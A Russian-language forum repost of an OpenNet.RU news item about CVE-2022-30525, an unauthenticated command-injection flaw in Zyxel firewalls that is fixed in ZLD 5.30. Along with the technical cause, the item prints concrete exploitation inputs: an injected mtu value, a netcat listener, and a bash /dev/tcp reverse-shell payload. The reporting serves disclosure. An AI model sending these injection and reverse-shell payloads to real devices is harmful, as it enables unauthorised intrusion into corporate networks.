Уязвимость в межсетевых экранах Zyxel, позволяющая выполнить код без аутентификации

Автор Сообщение
news_bot ®

Стаж: 6 лет 3 месяца
Сообщений: 27286

Создавать темы news_bot ® написал(а)
13-Май-2022 15:30

В устройствах Zyxel серий ATP, VPN и USG FLEX, предназначенных для организации работы межсетевых экранов, IDS и VPN на предприятиях, выявлена критическая уязвимость (CVE-2022-30525), позволяющая внешнему атакующему без аутентификации выполнить код на устройстве с правами пользователя nobody. Для совершения атаки злоумышленник должен иметь возможность отправки на устройство запросов по протоколу HTTP/HTTPS. Компания Zyxel устранила уязвимость в обновлении прошивки ZLD 5.30. По данным сервиса Shodan в настоящее время в глобальной сети зафиксировано 16213 потенциально уязвимых устройств, принимающих запросы по HTTP/HTTPS.
Эксплуатация производится через отправку специально оформленных команд к web-обработчику /ztp/cgi-bin/handler, доступному без аутентификации. Проблема вызвана отсутствием должной чистки параметров запроса при выполнение в системе команд при помощи вызова os.system, используемого в библиотеке lib_wan_settings.py и выполняемого при обработке операции setWanPortSt.
Например, атакующий может передать в поле mtu строку "; ping 192.168.1.210;" которая приведёт к выполнению в системе команды "ping 192.168.1.210". Для получения доступа к командной оболочке можно запустить на своей системе "nc -lvnp 1270", после чего инициировать обратное соединение (reverse shell) отправив на устройство запрос с параметром '; bash -c "exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;";'.
===========
Источник:
OpenNet.RU
===========

Похожие новости: Теги для поиска: #_zyxel, #_vulnerability
Профиль  ЛС 
Показать сообщения:     

Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете прикреплять файлы к сообщениям
Вы не можете скачивать файлы

Текущее время: 16-Май 04:44
Часовой пояс: UTC + 5